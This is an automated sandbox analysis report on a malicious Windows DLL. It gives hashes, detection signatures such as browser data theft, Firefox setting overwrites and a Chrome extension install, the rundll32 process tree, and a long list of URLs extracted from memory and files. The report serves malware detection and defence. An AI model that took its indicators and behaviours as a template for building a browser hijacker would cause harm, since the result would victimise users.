Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GqjUrFW.dll

Overview

General Information

Sample name:GqjUrFW.dll
Analysis ID:1502263
MD5:06ea49951dde098f018a213ee7a8a38d
SHA1:e8e31ed1db5f018664abf85154112ee1f478e9e2
SHA256:9b0892598b3725a436c414e9dddb9ef43b85d9bb08c2007dd8735a14374d132e
Tags:dll
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found suspicious ZIP file
Machine Learning detection for sample
Overwrites Mozilla Firefox settings
Tries to harvest and steal browser information (history, passwords, etc)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Installs a Chrome extension
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6336 cmdline: loaddll32.exe "C:\Users\user\Desktop\GqjUrFW.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 6288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6628 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 5868 cmdline: rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5956 cmdline: rundll32.exe C:\Users\user\Desktop\GqjUrFW.dll,#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 4280 cmdline: rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: GqjUrFW.dllAvira: detected
Antivirus detection for URL or domain
Source: https://ipfs.io/ipfs/QmXoypizjW3WknFiJnKLwHCnL72vedxjQkDDP1mXWo6uco/wiki/List_of_Google_domains.htmlAvira URL Cloud: Label: phishing
Multi AV Scanner detection for submitted file
Source: GqjUrFW.dllVirustotal: Detection: 39%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: GqjUrFW.dllJoe Sandbox ML: detected
Source: GqjUrFW.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: C:\Windows\SysWOW64\rundll32.exeDirectory created: C:\Program Files\Mozilla Firefox\browser\features\{EA8CA8DA-5FF9-493B-AC9C-93682EE7EB16}.xpiJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDirectory created: C:\Program Files\Mozilla Firefox\browser\omni.ja.bakJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDirectory created: C:\Program Files\Mozilla Firefox\browser\features\{EA8CA8DA-5FF9-493B-AC9C-93682EE7EB16}.xpiJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\FirefoxJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\MozillaJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
Source: rundll32.exe, 00000003.00000003.1666646738.0000000005043000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662204025.0000000002CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "*://www.facebook.com/platform/impression.php*", equals www.facebook.com (Facebook)
Source: omni.ja.bak.3.drString found in binary or memory: "url": "https://www.yahoo.com/?fr=hp-avast&type=752" equals www.yahoo.com (Yahoo)
Source: omni.ja.bak.3.drString found in binary or memory: "www.facebook.com" equals www.facebook.com (Facebook)
Source: omni.ja.bak.3.drString found in binary or memory: "www.youtube.com.", equals www.youtube.com (Youtube)
Source: rundll32.exe, 00000003.00000003.1668735841.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1667800987.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662288717.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662183688.0000000002CAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/platform/impression.php** equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662288717.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662183688.0000000002CAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/platform/impression.php*8OcN equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691390596.0000000003394000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747461262.000000000339B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/platform/impression.php*: equals www.facebook.com (Facebook)
Source: omni.ja.bak.3.drString found in binary or memory: http://certificates.godaddy.com/repository
Source: omni.ja.bak.3.drString found in binary or memory: http://certificates.starfieldtech.com/repository
Source: omni.ja.bak.3.drString found in binary or memory: http://certs.godaddy.com/repository/
Source: omni.ja.bak.3.drString found in binary or memory: http://certs.starfieldtech.com/repository/
Source: omni.ja.bak.3.drString found in binary or memory: http://foo.com
Source: omni.ja.bak.3.drString found in binary or memory: http://foo.com/
Source: omni.ja.bak.3.drString found in binary or memory: http://mozilla.org/MPL/2.0/
Source: omni.ja.bak.3.drString found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: omni.ja.bak.3.drString found in binary or memory: http://mozilla.org/f
Source: omni.ja.bak.3.drString found in binary or memory: http://mozilla.org/foo/b
Source: omni.ja.bak.3.drString found in binary or memory: http://mozilla.org/foo/bar/b
Source: omni.ja.bak.3.drString found in binary or memory: http://mozilla.org/foo/bar/baz
Source: omni.ja.bak.3.drString found in binary or memory: http://nazwa.pl
Source: omni.ja.bak.3.drString found in binary or memory: http://schema.org
Source: omni.ja.bak.3.drString found in binary or memory: http://schema.org/
Source: omni.ja.bak.3.drString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: omni.ja.bak.3.drString found in binary or memory: https://accounts.firefox.com/
Source: omni.ja.bak.3.drString found in binary or memory: https://accounts.firefox.com/settings/clients
Source: omni.ja.bak.3.drString found in binary or memory: https://addons.mozilla.org
Source: omni.ja.bak.3.drString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: omni.ja.bak.3.drString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: omni.ja.bak.3.drString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: omni.ja.bak.3.drString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: omni.ja.bak.3.drString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691390596.0000000003394000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747461262.000000000339B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691435396.000000000339A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691413102.00000000033A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691390596.0000000003394000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691413102.00000000033A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ads.stickyadstv.com/firefox-etpA
Source: rundll32.exe, 00000003.00000003.1666746155.0000000002ABD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1666780653.0000000002AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1666684582.0000000002AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ads.stickyadstv.com/firefox-etpe6
Source: rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662204025.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662183688.0000000002CAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ads.stickyadstv.com/firefox-etplK
Source: omni.ja.bak.3.drString found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: omni.ja.bak.3.drString found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: omni.ja.bak.3.drString found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: omni.ja.bak.3.drString found in binary or memory: https://autosug.ebay.com/autosug
Source: prefs.js_tempHROxPC.3.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: prefs.js_tempHROxPC.3.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1142137
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1145157
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1149603
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1150585
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1155114
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1155119
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1155145
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1181126
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1197885
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1205651
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1250907
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1252142
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1263733
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1267648
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1286752
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1288354
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1289808
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1300977
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1309305
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1312150
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1314673
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1315199
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1329981
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1334069
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1343305
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1365660
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1372336
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1372586
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1373288
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1374809
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1375006
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1378427
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1379974
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1381863
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1385914
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1391095
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1392378
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1393281
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1394595
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1397312
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1400600
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1402128
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1402158
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1407558
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1407559
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1414039
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1420411
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1423239
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1423400
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1425166
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1425376
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1427034
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1429055
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1429636
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1430172
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1430498
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1432467
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1433118
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1436524
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1437038
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1447252
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1458321
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1465399
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1480853
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1484351
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1484798
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1487485
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1504300
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1512640
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1513609
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1521150
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539007
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1569803
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1572287
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1664854
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1674587
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678378
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1679183
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1688277
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1691227
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1691771
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1694699#c21
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1694779
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1703616
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1709666
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1713980
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1716034
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1717548
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1719704
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1724254
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1740553
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1761053
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1762994
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1780845
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1797566
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1798526
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1834089
Source: omni.ja.bak.3.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1839689
Source: omni.ja.bak.3.drString found in binary or memory: https://certs.godaddy.com/repository/
Source: omni.ja.bak.3.drString found in binary or memory: https://certs.starfieldtech.com/repository/
Source: rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
Source: rundll32.exe, 00000005.00000003.1748202041.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748317016.00000000033A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreC
Source: omni.ja.bak.3.drString found in binary or memory: https://chromium.googlesource.com/chromium/src/
Source: rundll32.exe, 00000005.00000003.1748317016.00000000033A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmp, manifest.json0.3.dr, Secure Preferences.3.drString found in binary or memory: https://clients11.google.com/service/update2/crx
Source: rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients13.google.com/service/update2/crx
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1728672568.000000000475E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
Source: manifest.json.3.drString found in binary or memory: https://clients85.google.com/service/update2/crx
Source: omni.ja.bak.3.drString found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: omni.ja.bak.3.drString found in binary or memory: https://content.cdn.mozilla.net
Source: prefs.js_tempHROxPC.3.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: prefs.js_tempHROxPC.3.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: omni.ja.bak.3.drString found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: omni.ja.bak.3.drString found in binary or memory: https://coverage.mozilla.org
Source: omni.ja.bak.3.drString found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: omni.ja.bak.3.drString found in binary or memory: https://deploy-preview-1234--perf-html.netlify.com
Source: omni.ja.bak.3.drString found in binary or memory: https://deploy-preview-1234--perf-html.netlify.com/
Source: omni.ja.bak.3.drString found in binary or memory: https://deploy-preview-1234567--perf-html.netlify.app
Source: omni.ja.bak.3.drString found in binary or memory: https://developer.chrome.com/apps/i18n
Source: omni.ja.bak.3.drString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Navigator/requestMIDIAccess
Source: omni.ja.bak.3.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
Source: omni.ja.bak.3.drString found in binary or memory: https://developer.twitter.com/en/docs/twitter-for-websites/)
Source: rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
Source: omni.ja.bak.3.drString found in binary or memory: https://docs.telemetry.mozilla.org/concepts/pipeline/http_edge_spec.html?highlight=docId#postput-req
Source: omni.ja.bak.3.drString found in binary or memory: https://docs.telemetry.mozilla.org/cookbooks/new_ping.html#sending-a-custom-ping)
Source: omni.ja.bak.3.drString found in binary or memory: https://domain.com/file.js:1:10
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1728672568.000000000475E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-autopush.corp.google.com/
Source: rundll32.exe, 00000004.00000003.1726664804.0000000004751000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1728672568.000000000475E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748202041.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748317016.00000000033A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-0.corp.google.com/
Source: rundll32.exe, 00000004.00000003.1726664804.0000000004751000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1728672568.000000000475E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748202041.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748317016.00000000033A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.com/
Source: rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.google.com/
Source: rundll32.exe, 00000004.00000003.1726664804.0000000004751000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1728672568.000000000475E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748202041.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748317016.00000000033A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.google.com/
